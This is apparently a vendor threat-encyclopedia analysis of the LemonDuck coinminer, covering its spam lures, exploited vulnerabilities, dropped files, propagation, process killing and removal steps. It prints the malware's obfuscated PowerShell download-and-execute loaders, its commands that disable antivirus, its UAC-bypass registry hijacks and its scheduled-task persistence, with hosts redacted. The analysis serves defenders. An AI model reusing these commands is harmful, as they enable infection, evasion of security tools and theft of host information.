Fileless.LEMONDUCK

May 06, 2021

Analysis by: Arianne Grace Dela Cruz

ALIASES:

Trojan-Dropper.PowerShell.Compressed.b (KASPERSKY); Trojan.PowerShell.Crypt (IKARUS)

PLATFORM:

Windows, Linux

OVERALL RISK RATING:

DAMAGE POTENTIAL:

DISTRIBUTION POTENTIAL:

REPORTED INFECTION:

INFORMATION EXPOSURE:

Threat Type: Coinminer
Destructiveness: No
Encrypted: No
In the wild: Yes

OVERVIEW

Infection Channel: Spammed via email, Propagates via software vulnerabilities

This Coinminer arrives as an attachment to email messages spammed by other malware/grayware or malicious users.

It exploits software vulnerabilities to propagate to other computers across a network.

It executes the downloaded files. As a result, malicious routines of the downloaded files are exhibited on the affected system.

It gathers certain information on the affected computer.

It takes advantage of certain vulnerabilities.

TECHNICAL DETAILS

File Size: 3,845 bytes

File Type: PS1

Memory Resident: No

Initial Samples Received Date: 28 Apr 2021

Payload: Encrypts files, Collects system information, Connects to URLs/IPs, Downloads files, Drops files

Arrival Details

This Coinminer arrives as an attachment to the following email messages spammed by other malware/grayware or malicious users:

Where Email Subject - Message Body can be any of the following combinations:
- The Truth of COVID-19 - Virus actually comes from United States of America
- COVID-19 nCov Special info WHO - very important infomation for Covid-19 see attached document for your action and discretion.
- HALTH ADVISORY:CORONA VIRUS - the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future. see attached document for your action and discretion.
- WTF - what's wrong with you?are you out of your mind!!!!!
- What the fcuk - are you out of your mind!!!!!what 's wrong with you?
- good bye - good bye, keep in touch
- farewell letter - good bye, keep in touch
- broken file - can you help me to fix the file,i can't read it
- This is your order? - file is brokened, i can't open it

This malware arrives via the following means:

This malware may arrive by taking advantage of the following vulnerabilities:
- SMB request - Eternal Blue Exploit (CVE-2017-0144)
- SMBGhost vulnerability
It may be delivered once a system has been compromised due to the ProxyLogon Vulnerability:
- CVE-2021-26855
- CVE-2021-26857
- CVE-2021-26858
- CVE-2021-27065
RDP Brute-Forcing
SSH brute-forcing
Pass-the-hash attack using Mimikatz
MS-SQL brute-forcing
Redis remote command
Yarn remote command
Some variants of LemonDuck arrives via certutil LoLBin command:
- certutil -urlcache -split -f http://t.{BLOCKED}n.com/dns dn.ps1 - detected as Trojan.Win32.LEMONDUCK.THDBHBA
- certutil -urlcache -split -f http://t.{BLOCKED}n.com/m6.exe m6.exe - detected as Coinminer.Win64.TOOLXMR.SMA
- certutil -urlcache -split -f http://t.{BLOCKED}n.com/svchost.exe svchost.dat - detected as HackTool.Win32.NSSM.AD, used to install m6.exe as a service named "Windowsm_Update"

Installation

This Coinminer drops the following files:

{Removable/Network Drive name}\Dblue3.lnk
{Removable/Network Drive name}\Eblue3.lnk
{Removable/Network Drive name}\Fblue3.lnk
{Removable/Network Drive name}\Gblue3.lnk
{Removable/Network Drive name}\Hblue3.lnk
{Removable/Network Drive name}\Iblue3.lnk
{Removable/Network Drive name}\Jblue3.lnk
{Removable/Network Drive name}\Kblue3.lnk
{Removable/Network Drive name}\Dblue6.lnk
{Removable/Network Drive name}\Eblue6.lnk
{Removable/Network Drive name}\Fblue6.lnk
{Removable/Network Drive name}\Gblue6.lnk
{Removable/Network Drive name}\Hblue6.lnk
{Removable/Network Drive name}\Iblue6.lnk
{Removable/Network Drive name}\Jblue6.lnk
{Removable/Network Drive name}\Kblue6.lnk
{Removable/Network Drive name}\readme.js
{Removable/Network Drive name}\UTFsync\inf_data - serves as infection marker
Some LemonDuck variants deployed via the ProxyLogon vulnerability can drop the following files:
- %System%\inetpub\wwwroot\aspnet_client\js\demo\wanlin.txt
- %System%\inetpub\wwwroot\aspnet_client\js\demo\wanlins.aspx - Chopper Webshell

(Note: %System% is the Windows system folder, where it usually is C:\Windows\System32 on all Windows operating system versions.)

It drops and executes the following files:

%User Temp%\tt.vbs - install scheduled task to execute kk4kk.log (detected as HackTool.Win32.Mpacket.SM)
%System%\WindowsPowerShell\v1.0\{Random}.exe - legitimate copy of Powershell.exe

(Note: %User Temp% is the current user's Temp folder, which is usually C:\Documents and Settings\{user name}\Local Settings\Temp on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\AppData\Local\Temp on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).. %System% is the Windows system folder, where it usually is C:\Windows\System32 on all Windows operating system versions.)

It adds the following processes:

cmd /c start /b notepad "+{Malware file name}+" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('{Download URL}7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('{Download URL}mail.jsp?js_0.7')"
cmd /c echo Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionPath c:\;Add-MpPreference -ExclusionProcess %System%\WindowsPowerShell\v1.0\powershell.exe|powershell -w hidden
ComputerDefaults.exe - if ran in Windows 10
CompMgmtLauncher.exe - if ran in other OS
To uninstall antivirus related programs:
- cmd /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
- cmd /c "C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe" /verysilent /suppressmsgboxes /norestart
To open ports:
- cmd.exe /c netsh.exe firewall add portopening tcp 65529 SDNSd
- netsh.exe interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53
- netsh advfirewall firewall add rule name="deny445" dir=in protocol=tcp localport=445 action=block
- netsh advfirewall firewall add rule name="deny135" dir=in protocol=tcp localport=135 action=block
cmd.exe /c echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='9f9075b6db0089161c96cabf65974fa3';$ifp=$env:tmp+'\kr.bin';$down_url='{Download URL}';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?^^^&{Computer Name}^^^&{Gathered information}^^^&{MAC Address}');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|{Random}.exe -
cmd.exe /c echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='144f3ede7ec9d604a58113fc91a246d1';$ifp=$env:tmp+'\if.bin';$down_url='{Download URL}';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/if.bin?^^^&{Computer Name}^^^&{Gathered information}^^^&{MAC Address}');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|{Random}.exe -
For 64bit machines:
- cmd.exe /c echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\elocalTMn',[ref]$localKr)}catch{};$ifmd5='4001ba98a424fdb63047a23af97ec590';$ifp=$env:tmp+'\m6.bin';$down_url='{Download URL}';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6.bin?^^^&{Computer Name}^^^&{Gathered information}^^^&{MAC Address}');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|{Random}.exe -
For 64bit machines and video card is any of the following: {GTX, NVIDIA, GEFORCE, Radeon, AMD}
- cmd.exe /c echo try{$localTMng=$flase;New-Object Threading.Mutex($true,'Global\elocalTMng',[ref]$localKr)}catch{};$ifmd5='a921b532d5d239e4a2e71e5f853195cd';$ifp=$env:tmp+'\m6g.bin';$down_url='{Download URL}';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6g.bin?^^^&{Computer Name}^^^&{Gathered information}^^^&{MAC Address}');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|{Random}.exe -
Some variants of LemonDuck execute the following:
- Add users and local groups:
- Delete AV related firewall rules:
- Delete AV related services:
- powershell.exe -psconsolefile "$env:exchangeinstallpath\bin\exshell.psc1" -command "New-ManagementRoleAssignment –Role 'Mailbox Import Export' –User netcat"
- REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
- wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

(Note: %System% is the Windows system folder, where it usually is C:\Windows\System32 on all Windows operating system versions.)

It creates the following folders:

Variants of LemonDuck deployed via ProxyLogon Vulnerability can create the following folders:
- %System%\inetpub\wwwroot\aspnet_client\js\demo
- {Exchange server installation path}\Frontend\HttpProxy\ecp\auth\js\demo

(Note: %System% is the Windows system folder, where it usually is C:\Windows\System32 on all Windows operating system versions.)

Other System Modifications

This Coinminer modifies the following registry entries:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Services\LanmanServer\Parameters
DisableCompression = 1

HKEY_CURRENT_USER\Software\Classes\
ms-settings\shell\open\
command
DelegateExecute = {Null}

HKEY_CURRENT_USER\Software\Classes\
ms-settings\shell\open\
command
(default) = cmd /c echo Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionPath c:\;Add-MpPreference -ExclusionProcess %System%\WindowsPowerShell\v1.0\powershell.exe|powershell -w hidden & Iex(new-object net.webclient).downloadstring('"+{Download URL}+"?$env:username*$env:computername*$ver')

HKEY_CURRENT_USER\Software\Classes\
mscfile\shell\open\
command
DelegateExecute = {Null}

HKEY_CURRENT_USER\Software\Classes\
mscfile\shell\open\
command
(default) = cmd /c powershell -w hidden Iex(new-object net.webclient).downloadstring('"+{Download URL}+"?$env:username*$env:computername*$ver')

Propagation

This Coinminer exploits the following software vulnerabilities to propagate to other computers across a network:

SMB request - Eternal Blue Exploit (CVE-2017-0144)
- Upon exploitation, it may perform the following:
  - Execute the following command: cmd /c schtasks /create /ru system /sc MINUTE /mo 120 /tn Rtsa /tr "powershell -c '\\"{Download URL 1}\\",\\"{Download URL 2}\\",\\"{Download URL 2}\\"|foreach{I`EX(Ne`w-Obj`ect Net.WebC`lient).\\"DownloadString\\"(\\"http://$_/ebo.jsp?0.9*$env:username*$env:computername\\")}'" /F & echo %path%|findstr /i powershell>nul || (setx path "%path%;c:\windows\system32\WindowsPowershell\v1.0" /m) & schtasks /run /tn Rtsa
  - Install the following scheduled task:
SMBGhost vulnerability
- Upon exploitation, it executes the following command:
RDP Brute-Forcing
SSH brute-forcing
- Upon exploitation, it may execute the following:
Pass-the-hash Attack
- Uses PowerDump module and Mimikatz to dump Username, password, NTLM hashes, and domain information of the target machine.
MS-SQL brute-forcing
- Upon successful brute-forcing, it will add a malware detected as HackTool.Win32.EvilCLR.YXBCIA to the database server to enable the execution of the following: "powershell.exe iex(new-object net.webclient).downloadstring('{Download URL}/if.bin?once')"
- It scans for vulnerable MS-SQL port 1433. Upon exploitation, it will execute the following commands:
Redis remote command
- Upon scanning for vulnerable port 6379, 16379, it may perform the following command:
Yarn remote command
- Upon scanning for vulnerable port 8088, it may perform the following command:
Logic Port Scan
- Upon scanning for vulnerable port 7001, it may perform the following command:
Vulnerable networks in port 445
- Upon exploiting vulnerable networks connecting to port 445, it does the following:

(Note: %System% is the Windows system folder, where it usually is C:\Windows\System32 on all Windows operating system versions.. %User Startup% is the current user's Startup folder, which is usually C:\Windows\Profiles\{user name}\Start Menu\Programs\Startup on Windows 98 and ME, C:\WINNT\Profiles\{user name}\Start Menu\Programs\Startup on Windows NT, C:\Documents and Settings\{User name}\Start Menu\Programs\Startup on Windows 2003(32-bit), XP and 2000(32-bit), or C:\Users\{user name}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit), 10(64-bit).)

Process Termination

This Coinminer terminates the following services if found on the affected system:

.Net CLR
\gm
360rTys
ALGM
aspnet_staters
AxInstSV
ClipBooks
CLR
clr_optimization
DNS Server
ExpressVNService
IPSECS
lsass
Microsoft
Microsoft Telemetry
MpeSvc
mssecsvc2.0
mssecsvc2.1
Natimmonal
Nationaaal
National
Nationalaie
Nationalmll
Nationaloll
Nationalwpi
NetMsmqActiv Media NVIDIA
Oracleupdate
RpcEptManger
Samserver
Serhiez
Sncryption Media Playeq
Sougoudl
SRDSL
SuperProServer
SvcNlauser
SVSHost
SxS
sysmgt
system
taskmgr1
WebServers
WifiService
Windows Managers
Windows_Update
WinHasdadelp32
WinHasdelp32
WinHelp32
WinHelp64
WinHelpSvcs
WinSvc
WinVaultSvc
WissssssnHelp32
WmdnPnSN
wmiApServs
wmiApSrvs
WWW.{BLOCKED}S.CN.COM
Xtfy
Xtfya
Xtfyxxx
xWinWpdSrv
Zational

It terminates processes or services that contain any of the following strings if found running in the affected system's memory:

360
8866
9696
9797
9966
auto-upgeade
Avira
Calligrap
cara
Carbon
carss
cohernece
conhoste
csrsc
DW20
explores
Galligrp
gxdrv
Imaging
javaupd
lsmosee
minerd
MinerGate
msinfo
ress
SC
SearchIndex
secuams
service
Setring
Setting
Sqlceqp
SQLEXPRESS_X64_86
SQLforwin
svchosti
svshost
SystemIIS
SystemIISSec
taskegr
taskmgr1
Terms.EXE
Uninsta
update
upgeade
WerFault
WerMgr
win
WindowsDefender*
WindowsUpdater*
Workstation
xig*
XMR*
xmrig*
yamm1
360bdoctor.exe
360rp.exe
360rps.exe
360safe_cq.exe
360safe_se.exe
360sd.exe
360speedld.exe
360Tray.exe
360LogCenter.exe
360tray.exe
360speedld.exe
360se.exe

Dropping Routine

This Coinminer takes advantage of the following software vulnerabilities to drop malicious files:

Windows LNK Remote Code Execution Vulnerability (CVE-2017-8464) - Dropped in removable drives to allow execution of remote commands.

Download Routine

This Coinminer connects to the following URL(s) to download its component file(s):

{Download URL}\m6.bin
{Download URL}\m6g.bin
{Download URL}\kr.bin
{Download URL}\if.bin
{Download URL}\if_mail.bin
{Download URL}\ode.bin
{Download URL}\nvd.zip
{Download URL}\20.dat - saved as %User Temp%\kk4kk.log
{Download URL}\mso.jsp
{Download URL}\ms.jsp
{Download URL}\rdp.jsp
{Download URL}\rdpo.jsp
{Download URL}\smgh.jsp
{Download URL}\smgho.jsp
{Download URL}\logic.jsp
{Download URL}\logico.jsp
{Download URL}\report.jsp - install scheduled tasks and WMI
{Download URL}\mm.bin - Mimikatz module
{Download URL}\core.png - Linux bash file for downloading related modules
{Download URL}\a.asp - Linux bash file for killing competitions

It saves the files it downloads using the following names:

%User Temp%\m6.bin - Modified XMRig for 64bit Machines
%User Temp%\m6g.bin - Coinminer for 64bit Machines and video card name has the one of the following strings:"GTX","NVIDIA","GEFORCE","Radeon","AMD"
%User Temp%\kr.bin - Kill Competitions Module
%User Temp%\if.bin - Propagation and Exploitation Module
%User Temp%\if_mail.bin - Email Spreader Module
%User Temp%\ode.bin - Downloads PowerSploit module and create scheduled task
%User Temp%\nvd.zip - Coinminer for 64bit Machines and video card name has the one of the following strings:"GTX","NVIDIA","GEFORCE","Radeon","AMD"
%User Temp%\mimi.dat - Mimikatz module
Modules for Process Termination, Task and WMI installation:
- %User Temp%\mso.jsp
- %User Temp%\ms.jsp
- %User Temp%\rdp.jsp
- %User Temp%\rdpo.jsp
- %User Temp%\smgh.jsp
- %User Temp%\smgho.jsp
- %User Temp%\logic.jsp
- %User Temp%\logico.jsp

It then executes the downloaded files. As a result, malicious routines of the downloaded files are exhibited on the affected system.

Information Theft

This Coinminer gathers the following information on the affected computer:

Machine Type (32bit or 64bit)
Computer Name
Product UUID
Mac Address
Operating system
User name
Machine Domain
System uptime
Video Controller name
Physical memory
Drive information:
- Drive Type
- Free space
- Drive format
Time stamp
JavaScript information on localhost
Host Name
Coinminer version - if a coinminer is present
Ip address - if a coinminer is present
Total hashrate - if a coinminer is present
First 6 bytes of md5 hashes of malicious files

Other Details

This Coinminer does the following:

It adds the following
Infection Marker:

__EventFilter

Name: blackball

Persistence:

__EventFilter

Name: {Random}

CommandLineEventConsumer

Name: {Random}
Command: powershell -w hidden -c function a($u){$d=(Ne`w-Obj`ect
__FilterToConsumerBinding

It disables Windows Defender Real Time Monitoring. It excludes Powershell.exe running in C:\ directory in Windows
http://t.{BLOCKED}g.com
http://t.{BLOCKED}9.com
http://t.{BLOCKED}x.com
http://t.{BLOCKED}q.com
http://d.{BLOCKED}p.com
http://t.{BLOCKED}1.com
http://t.{BLOCKED}0.com
http://down.{BLOCKED}cat.com
http://t.{BLOCKED}kit.com
http://t.{BLOCKED}kit.com
http://d.{BLOCKED}g.com
http://p.{BLOCKED}q.com
http://lplp.{BLOCKED}g.com
http://w.{BLOCKED}0.com
http://info.{BLOCKED}x.com
http://info.{BLOCKED}g.com
http://info.{BLOCKED}0.com
http://t.{BLOCKED}q.top
http://p.{BLOCKED}a.com
http://t.{BLOCKED}2.com
http://t.{BLOCKED}q.com
http://ps2.{BLOCKED}ihua
http://t.{BLOCKED}n.com
http://t.{BLOCKED}r.cc
http://t.{BLOCKED}0.sh
http://t.{BLOCKED}cat.co
http://d.{BLOCKED}8.ag
{BLOCKED}.{BLOCKED}.154.202
{BLOCKED}.{BLOCKED}.7.85
{BLOCKED}.{BLOCKED}.43.37
{BLOCKED}.{BLOCKED}.225.82
{BLOCKED}.{BLOCKED}.107.193
{BLOCKED}.{BLOCKED}.80.221
{BLOCKED}.{BLOCKED}.183.160
{BLOCKED}.{BLOCKED}.188.255
{BLOCKED}.{BLOCKED}.158.207

Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('{Base64 encoded command}');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='{Download URL}';a($url+'/a.jsp?mail_20210428?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))

It will only modify "HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command" if the OS is Windows 10. Otherwise, the registry "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" will be modified.
It deletes the following scheduled tasks:
- /Rtsa
- /Rtsa1
- /Rtsa2
- AdobeFlashPlayer
- Bluetooths
- Credentials
- Ddrivers
- DNS
- DnsCore
- DnsCore
- DnsScan
- ECDnsCore
- Flash
- FlashPlayer1
- FlashPlayer2
- FlashPlayer3
- gm
- GooglePingConfigs
- HispDemorn
- HomeGroupProvider
- IIS
- LimeRAT-Admin
- Microsoft Telemetry
- Miscfost
- MiscfostNsi
- my1
- Mysa
- Mysa1
- Mysa2
- Mysa3
- Netframework
- ngm
- ok
- Oracle Java
- Oracle Java Update
- Oracle Products Reporter
- RavTask
- skycmd
- Sorry
- Spooler SubSystem Service
- System Log Security Check
- SYSTEM"qPt,"DNS2
- SYSTEMa
- TablteInputout
- Update
- Update qPtservice for Windows Service
- Update service for products
- Update_windows
- Update1
- Update2
- Update3
- Update4
- WebServers
- werclpsyport
- Windows_Update
- WindowsLogTasks
- WindowsUpdate1
- WindowsUpdate2
- WindowsUpdate3
- WwANsvc
It check the presence of Outlook and Outlook\Security in the following registry keys:
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Office
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Office
If present, it will modify the registry entry:
{Registry Key from list above}
ObjectModelGuard = 2
It uses any of the following {Download URL} to send gathered information, as well as download related modules:
- http://t.{BLOCKED}9.com
It sets the machine's DNS server to Google (8.8.8.8 or 9.9.9.9)
It uses the following credentials for brute-forcing:
- Username:
- Passwords:
- NTLM Hashes:
It sends copies of itself as zip attachment to email addresses gathered from the victim machine's Outlook contacts, inbox and sent items. It would delete the emails it sent from the sent items folder.
It tries to connect to the named pipe \.\pipe\HHyeuqi7\ and execute its email propagation module.
It terminates processes connecting to the following domains:
- pg.{BLOCKED}q.com
- p.{BLOCKED}q.com
- pg.{BLOCKED}4.com
- p.{BLOCKED}4.com
- lplp.{BLOCKED}g.com
It terminates processes that established a TCP connection to the following ports:
- 1111
- 2222
- 3333
- 4444
- 5555
- 6666
- 7777
- 8888
- 9999
- 14433
- 14444
- 43669
- 43668
- 45560
- 65333

It takes advantage of the following vulnerabilities:

CVE-2017-0199 - Allows remote code execution upon opening the DOC file detected as Trojan.W97M.LEMONDUCK.*

It adds the following scheduled tasks:

Task Name: blackball
Task to be run: blackball
Task Name: {random}
Task to be run: powershell -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('{Base64 encoded command}');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='{Download URL}';a($url+'/a.jsp?mail_20210428?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))

SOLUTION

Minimum Scan Engine: 9.800

FIRST VSAPI PATTERN FILE: 15.932.08

FIRST VSAPI PATTERN DATE: 07 May 2020

VSAPI OPR PATTERN File: 15.933.00

VSAPI OPR PATTERN Date: 08 May 2020

Step 1

Before doing any scans, Windows 7, Windows 8, Windows 8.1, and Windows 10 users must disable System Restore to allow full scanning of their computers.

Step 2

Note that not all files, folders, and registry keys and entries are installed on your computer during this malware's/spyware's/grayware's execution. This may be due to incomplete installation or other operating system conditions. If you do not find the same files/folders/registry information, please proceed to the next step.

Step 3

Restart in Safe Mode

[ Learn More ]

Step 4

Restore this modified registry value

[ Learn More ]

Important: Editing the Windows Registry incorrectly can lead to irreversible system malfunction. Please do this only if you know how to or you can seek your system administrator’s help. You may also check out this Microsoft article first before modifying your computer's registry.

In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
- DisableCompression = 1
- DisableCompression = {Default}
In HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command
- DelegateExecute = {Null}
- DelegateExecute = {Default}
In HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command
- (default) = cmd /c echo Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionPath c:\;Add-MpPreference -ExclusionProcess %System%\WindowsPowerShell\v1.0\powershell.exe|powershell -w hidden & Iex(new-object net.webclient).downloadstring('"+{Download URL}+"?$env:username*$env:computername*$ver')
- (default) = {Default}
In HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command
- DelegateExecute = {Null}
- DelegateExecute = {Default}
In HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command
- (default) = cmd /c powershell -w hidden Iex(new-object net.webclient).downloadstring('"+{Download URL}+"?$env:username*$env:computername*$ver')
- (default) = {Default}
- {Registry Key in Outlook\Security in the list mentioned}
- ObjectModelGuard = 2
- ObjectModelGuard = {Default}

Step 5

Deleting Scheduled Tasks

The following {Task Name} - {Task to be run} listed should be used in the steps identified below:

Rtsa - \"{Download URL 1}\",\"{Download URL 2}\",\"{Download URL 2}\"|foreach{I`EX(Ne`w-Obj`ect Net.WebC`lient).\"DownloadString\"(\"http://$_/ebo.jsp?0.9*$env:username*$env:computername\")}"
blackball - blackball
{random} - powershell -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('{Base64 encoded command}');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='{Download URL}';a($url+'/a.jsp?mail_20210428?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))

For Windows 2000, Windows XP, and Windows Server 2003:

Open the Windows Scheduled Tasks. Click Start>Programs>Accessories>
System Tools>Scheduled Tasks.
Locate each {Task Name} values listed above in the Name column.
Right-click on the said file(s) with the aforementioned value.
Click on Properties. In the Run field, check for the listed {Task to be run}.
If the strings match the list above, delete the task.

For Windows Vista, Windows 7, Windows Server 2008, Windows 8, Windows 8.1, and Windows Server 2012:

Open the Windows Task Scheduler. To do this:
• On Windows Vista, Windows 7, and Windows Server 2008, click Start, type taskschd.msc in the Search input field, then press Enter.
• On Windows 8, Windows 8.1, and Windows Server 2012, right-click on the lower left corner of the screen, click Run, type taskschd.msc, then press Enter.
In the left panel, click Task Scheduler Library.
In the upper-middle panel, locate each {Task Name} values listed above in the Name column.
In the lower-middle panel, click the Actions tab. In the Details column, check for the {Task to be run} string.
If the said string is found, delete the task.

Step 6

Search and delete these files

[ Learn More ]

There may be some files that are hidden. Please make sure you check the Search Hidden Files and Folders checkbox in the "More advanced options" option to include all hidden files and folders in the search result.

{Removable/Network Drive name}\Dblue3.lnk
{Removable/Network Drive name}\Eblue3.lnk
{Removable/Network Drive name}\Fblue3.lnk
{Removable/Network Drive name}\Gblue3.lnk
{Removable/Network Drive name}\Hblue3.lnk
{Removable/Network Drive name}\Iblue3.lnk
{Removable/Network Drive name}\Jblue3.lnk
{Removable/Network Drive name}\Kblue3.lnk
{Removable/Network Drive name}\Dblue6.lnk
{Removable/Network Drive name}\Eblue6.lnk
{Removable/Network Drive name}\Fblue6.lnk
{Removable/Network Drive name}\Gblue6.lnk
{Removable/Network Drive name}\Hblue6.lnk
{Removable/Network Drive name}\Iblue6.lnk
{Removable/Network Drive name}\Jblue6.lnk
{Removable/Network Drive name}\Kblue6.lnk
{Removable/Network Drive name}\readme.js
{Removable/Network Drive name}\UTFsync\inf_data
%System%\inetpub\wwwroot\aspnet_client\js\demo\wanlin.txt
%System%\inetpub\wwwroot\aspnet_client\js\demo\wanlins.aspx
%User Temp%\tt.vbs
%User Temp%\m6.bin
%User Temp%\m6g.bin
%User Temp%\kr.bin
%User Temp%\if.bin
%User Temp%\if_mail.bin
%User Temp%\ode.bin
%User Temp%\nvd.zip
%User Temp%\mimi.dat
%User Temp%\mso.jsp
%User Temp%\ms.jsp
%User Temp%\rdp.jsp
%User Temp%\rdpo.jsp
%User Temp%\smgh.jsp
%User Temp%\smgho.jsp
%User Temp%\logic.jsp
%User Temp%\logico.jsp
{Malware Path}\dn.ps1
{Malware Path}\m6.exe
{Malware Path}\svchost.dat

Step 7

Restart in normal mode and scan your computer with your Trend Micro product for files detected as Fileless.LEMONDUCK. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check this Knowledge Base page for more information.

Did this description help? Tell us how we did.

Fileless.LEMONDUCK

OVERVIEW

TECHNICAL DETAILS

SOLUTION

Resources

Support

About Trend

Country Headquarters

Fileless.LEMONDUCK

OVERVIEW

TECHNICAL DETAILS

SOLUTION

Resources

Support

About Trend

Country Headquarters

The Americas

Middle East & Africa

Europe

Asia & Pacific